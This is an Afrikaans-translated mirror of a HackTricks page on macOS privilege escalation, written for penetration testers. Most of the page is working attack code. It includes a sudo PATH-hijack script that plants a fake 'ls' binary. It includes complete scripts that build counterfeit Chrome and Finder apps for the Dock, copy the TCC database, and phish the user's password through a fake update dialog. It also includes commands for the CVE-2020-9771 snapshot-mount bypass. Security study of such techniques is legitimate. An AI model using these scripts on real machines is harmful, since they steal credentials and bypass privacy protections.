Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-25 22:20:43 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md
Translator workflow 9f40607d8c Translated to Afrikaans
2024-02-11 02:07:06 +00:00

12 KiB
Raw Blame History

macOS Voorregverhoging

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

TCC Voorregverhoging

As jy hier gekom het op soek na TCC-voorregverhoging, gaan na:

{% content-ref url="macos-security-protections/macos-tcc/" %} macos-tcc {% endcontent-ref %}

Linux Privesc

Let daarop dat die meeste truuks oor voorregverhoging wat Linux/Unix beïnvloed, ook MacOS-masjiene sal beïnvloed. Sien dus:

{% content-ref url="../../linux-hardening/privilege-escalation/" %} privilege-escalation {% endcontent-ref %}

Gebruikerinteraksie

Sudo-kaping

Jy kan die oorspronklike Sudo-kapingstegniek binne die Linux Voorregverhoging-pos vind.

Nietemin handhaaf macOS die gebruiker se PATH wanneer hy sudo uitvoer. Dit beteken dat 'n ander manier om hierdie aanval uit te voer, sou wees om ander bineêre lêers te kaap wat die slagoffer sal uitvoer wanneer hy sudo uitvoer:

# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH
cat > /opt/homebrew/bin/ls <<EOF
#!/bin/bash
if [ "\$(id -u)" -eq 0 ]; then
whoami > /tmp/privesc
fi
/bin/ls "\$@"
EOF
chmod +x /opt/homebrew/bin/ls

# victim
sudo ls

Let wel dat 'n gebruiker wat die terminal gebruik, hoogstwaarskynlik Homebrew geïnstalleer het. Dit is dus moontlik om binêre lêers in /opt/homebrew/bin te kap.

Dok Impersonation

Deur van sosiale manipulasie gebruik te maak, kan jy byvoorbeeld Google Chrome impersonate in die dok en jou eie skripsie uitvoer:

{% tabs %} {% tab title="Chrome Impersonation" %} Sommige voorstelle:

  • Kyk in die dok of daar 'n Chrome is, en in daardie geval verwyder daardie inskrywing en voeg die vals Chrome-inskrywing in dieselfde posisie in die dok-reeks by. 
#!/bin/sh

# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';

rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null

# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources

# Payload to execute
cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
char *cmd = "open /Applications/Google\\\\ Chrome.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF

gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c

chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome

# Info.plist
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Google Chrome</string>
<key>CFBundleIdentifier</key>
<string>com.google.Chrome</string>
<key>CFBundleName</key>
<string>Google Chrome</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF

# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns

# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock

{% endtab %}

{% tab title="Finder-impersonasie" %} Sommige voorstelle:

  • Jy kan Finder nie uit die Dock verwyder nie, so as jy dit by die Dock wil voeg, kan jy die vals Finder net langs die regte een plaas. Hiervoor moet jy die valse Finder-inskrywing aan die begin van die Dock-reeks byvoeg.
  • 'n Ander opsie is om dit nie in die Dock te plaas nie en dit net oop te maak, "Finder vra om Finder te beheer" is nie so vreemd nie.
  • Ander opsies om na root te eskaleer sonder om die wagwoord te vra met 'n afskuwelike boks, is om Finder regtig te vra om die wagwoord te vra om 'n bevoorregte aksie uit te voer:
  • Vra Finder om 'n nuwe sudo-lêer na /etc/pam.d te kopieer (Die aanduiding wat vir die wagwoord gevra word, sal aandui dat "Finder sudo wil kopieer")
  • Vra Finder om 'n nuwe Goedkeuringsprop te kopieer (Jy kan die lêernaam beheer sodat die aanduiding wat vir die wagwoord gevra word, aandui dat "Finder Finder.bundle wil kopieer") {% endtab %}
#!/bin/sh

# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';

rm -rf /tmp/Finder.app/ 2>/dev/null

# Create App structure
mkdir -p /tmp/Finder.app/Contents/MacOS
mkdir -p /tmp/Finder.app/Contents/Resources

# Payload to execute
cat > /tmp/Finder.app/Contents/MacOS/Finder.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
char *cmd = "open /System/Library/CoreServices/Finder.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF

gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder
rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c

chmod +x /tmp/Finder.app/Contents/MacOS/Finder

# Info.plist
cat << EOF > /tmp/Finder.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Finder</string>
<key>CFBundleIdentifier</key>
<string>com.apple.finder</string>
<key>CFBundleName</key>
<string>Finder</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF

# Copy icon from Finder
cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns

# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock

{% endtab %} {% endtabs %}

TCC - Wortelvoorregverhoging

CVE-2020-9771 - mount_apfs TCC-omleiding en voorregverhoging

Enige gebruiker (selfs onbevoorregte gebruikers) kan 'n tydmasjien-snapshot skep en monteer en ALLE lêers van daardie snapshot toegang verkry.
Die enigste voorreg wat nodig is, is dat die gebruikte toepassing (soos Terminal) Volle Skyf Toegang (FDA) toegang (kTCCServiceSystemPolicyAllfiles) moet hê wat deur 'n administrateur verleen moet word.

{% code overflow="wrap" %}

# Create snapshot
tmutil localsnapshot

# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local

# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap

# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap

# Access it
ls /tmp/snap/Users/admin_user # This will work

{% endcode %}

'n Meer gedetailleerde verduideliking kan gevind word in die oorspronklike verslag.

Sensitiewe Inligting

Dit kan nuttig wees om voorregte te verhoog:

{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %} macos-sensitive-locations.md {% endcontent-ref %}

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun: